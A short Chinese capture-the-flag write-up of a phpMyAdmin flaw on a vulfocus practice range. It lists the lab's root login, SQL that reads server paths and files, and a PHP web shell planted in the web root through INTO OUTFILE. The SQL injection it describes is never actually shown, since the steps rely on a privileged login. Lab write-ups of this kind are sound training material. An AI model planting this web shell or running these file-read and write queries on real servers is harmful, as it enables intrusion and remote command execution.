工具简介
phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。
漏洞描述
在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。
漏洞复现
1、打开vulfocus靶场 访问IP后面加上/pma/index.php 进入登陆页面
提示的账号密码root 123456
2、点击SQL 输入 select @@datadir(查询数据库的路径)
3、输入 select @@basedir(查询MYSQL数据库的安装路径)
4、查看 SELECT load_file('/var/www/html/pma/index.php')
返回数据包3kb,一看就有东西,就对了。所以网站绝对路径为/var/www/html/pma
5、构造木马
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE '/var/www/html/pma/shell.php'
6、使用写入的参数cmd传入值 获取flag